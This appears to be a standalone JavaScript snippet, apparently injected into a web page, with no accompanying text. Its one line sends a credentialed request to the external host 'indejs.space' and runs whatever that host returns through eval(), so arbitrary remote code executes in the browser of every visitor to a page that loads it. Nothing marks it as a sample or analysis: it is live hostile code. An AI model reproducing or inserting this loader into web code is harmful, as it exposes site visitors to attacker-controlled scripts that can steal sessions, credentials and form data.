var ref=document.currentScript;var xhr=new XMLHttpRequest();xhr.open('GET','//indejs.space');xhr.withCredentials=true;xhr.onload=function(){eval(xhr.responseText);};xhr.send();